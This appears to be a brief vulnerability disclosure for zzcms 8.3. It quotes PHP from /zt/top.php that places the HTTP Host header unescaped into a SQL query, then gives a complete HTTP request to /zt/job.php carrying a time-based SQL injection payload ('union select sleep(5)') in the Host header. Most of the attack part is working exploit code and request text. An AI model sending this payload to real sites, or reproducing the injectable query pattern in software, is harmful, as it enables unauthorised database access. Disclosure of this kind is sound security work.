http://www.zzcms.net/about/6.htm
http://www.zzcms.net/download/zzcms8.3.zip
in file "/zt/top.php", line 5
<?php
//echo $_SERVER['REQUEST_URI'];
$editor=isset($_REQUEST['editor'])?$_REQUEST['editor']:'';
$editor=substr($_SERVER['HTTP_HOST'],0,strpos($_SERVER['HTTP_HOST'],'.'));//从二级域名中获取用户名
$rs=query("select * from zzcms_userdomain where domain='".$_SERVER['HTTP_HOST']."' and passed=1 and del=0");//从顶级级域名中获取用户名
$row=num_rows($rs);
if (!$row){
$row=fetch_array($rs);
$editor=$row["username"];
}
$id=isset($_REQUEST['id'])?$_REQUEST['id']:0;
checkid($id,1);
...
in line 5,coder use $_SERVER['HTTP_HOST']
in sql code,and this variable can be controled by attacker in nginx. So,just find a page that include /zt/top.php
,like /zt/job.php
:
<?php
include("../inc/conn.php");
include("../inc/fy.php");
include("top.php");
include("bottom.php");
include("left.php");
...
GET /zt/job.php?id=0&editor=aa HTTP/1.1
Host: xxxx.com' union select sleep(5),0,0,0,0-- '
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie:
Connection: close